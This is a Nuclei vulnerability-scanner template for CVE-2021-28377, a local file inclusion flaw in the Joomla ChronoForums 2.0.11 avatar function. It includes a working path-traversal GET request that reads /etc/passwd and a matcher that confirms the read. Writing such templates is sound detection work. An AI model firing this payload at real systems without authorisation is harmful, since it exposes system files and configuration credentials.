nuclei-templates/cves/2021/CVE-2021-28377.yaml

34 lines
1.0 KiB
YAML
Raw Normal View History

2022-04-01 10:02:22 +00:00
id: CVE-2021-28377
2022-04-01 10:02:22 +00:00
info:
name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
2022-04-01 10:02:22 +00:00
author: 0x_Akoko
severity: medium
description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
2022-04-01 10:02:22 +00:00
reference:
- https://herolab.usd.de/en/security-advisories/usd-2021-0007/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28377
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2022-04-01 10:02:22 +00:00
cve-id: CVE-2021-28377
cwe-id: CWE-22
tags: cve,cve2021,chronoforums,lfi,joomla
2022-04-01 10:02:22 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-04-01 10:02:22 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22